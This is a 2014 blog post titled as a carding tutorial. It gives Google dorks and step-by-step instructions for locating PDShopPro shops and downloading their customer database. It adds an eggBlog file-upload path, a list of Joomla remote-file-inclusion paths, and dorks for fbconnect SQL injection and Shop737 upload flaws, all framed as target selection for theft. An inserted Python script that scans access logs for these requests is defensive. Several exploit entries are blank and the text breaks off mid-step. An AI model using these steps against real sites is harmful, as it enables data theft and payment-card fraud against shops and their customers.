Monday, June 30, 2014

Carding Tutorial - PDShopPro Shopping Cart

Dork:
allinurl:/shop/category.asp?catid=

Steps:
1- Copy and paste the dork on Google
2- Choose any site
3- For example, your site is 
 www.example.com/shop/category.asp?catid=2
4- Remove /shop/category.asp?catid=2 and replace it with /admin/dbsetup.asp and you will see something like this.

 

5- If you get something like this, that means the site is vulnerable.
6- Now, continue our next step by replacing /admin/dbsetup.asp with /data/pdshoppro.mdb

Exploit eggBlog 414 Arbitrary File Upload


Dork:
"powered by eggBlog.net"

Exploit : 
/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=

Remote File Inclusion [RFI] Dorks




/components/com_flyspray/startdown.php?file=
/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
/components/com_simpleboard/file_upload.php?sbp=
/components/com_hashcash/server.php?mosConfig_absolute_path=
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
/components/com_performs/performs.php?mosConfig_absolute_path=
/components/com_forum/download.php?phpbb_root_path=
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=
/components/minibb/index.php?absolute_path=
/components/com_smf/smf.php?mosConfig_absolute_path=
/modules/mod_calendar.php?absolute_path=
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
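
Requests for the PDShopPro paths and the include-path parameters listed above show up plainly in web server access logs. The following Python log check is an added example, not part of the original post; it assumes combined-format access logs, and the sample lines, addresses and host name in it are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Paths named on this page that a public client has no reason to request.
SENSITIVE_PATHS = ("/admin/dbsetup.asp", "/data/pdshoppro.mdb")
# Include-path parameter names taken from the list above (lower-cased).
INCLUDE_PARAMS = {"mosconfig_absolute_path", "absolute_path",
                  "phpbb_root_path", "sbp", "file"}
# A parameter value that starts with a remote scheme is the remote-include signal.
REMOTE_VALUE = re.compile(r"^(?:https?|ftp)://", re.I)
# Assumed layout: ip ident user [time] "METHOD target PROTO" status size
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+)[^"]*" (\d{3})')

def classify(line):
    """Return (client, status, reason) for a suspicious request, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    client, _method, target, status = m.groups()
    url = urlsplit(target)
    # IIS paths are case-insensitive, so compare lower-cased.
    if url.path.lower().endswith(SENSITIVE_PATHS):
        return client, int(status), "sensitive-path"
    # parse_qsl percent-decodes values, so encoded URLs are caught too.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name.lower() in INCLUDE_PARAMS and REMOTE_VALUE.match(value):
            return client, int(status), "remote-include-param"
    return None

def scan(lines):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Jun/2014:10:00:01 +0000] "GET /shop/category.asp?catid=2 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [30/Jun/2014:10:00:09 +0000] "GET /admin/dbsetup.asp HTTP/1.1" 403 312',
    '203.0.113.5 - - [30/Jun/2014:10:00:15 +0000] "GET /data/PDShopPro.mdb HTTP/1.1" 200 884736',
    '198.51.100.7 - - [30/Jun/2014:11:12:40 +0000] "GET /components/com_smf/smf.php'
    '?mosConfig_absolute_path=http%3A%2F%2Fexample.invalid%2Fa.txt HTTP/1.1" 404 210',
    '198.51.100.7 - - [30/Jun/2014:11:13:02 +0000] "GET /modules/mod_calendar.php'
    '?absolute_path=/var/www/site HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, status, reason in scan(SAMPLE_LOG):
        print(client, status, reason)
```

A hit with status 200 on the `.mdb` path means the database file was actually served, so the file belongs outside the web root and the request should be treated as a data exposure rather than a probe.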

Exploit Wordpress : fbconnect SQL Injection Vulnerability

Dork:
inurl:"fbconnect_action=myhome"

Exploit: 

Shop737 - File Upload Vulnerabilities

Finding Vulnerable Target

Dork:
intext:"Powered by Shop737"

1- Copy and paste this dork on Google.

2- Choose any site as your target.

3- Once you clicked on your target, you will see something like this,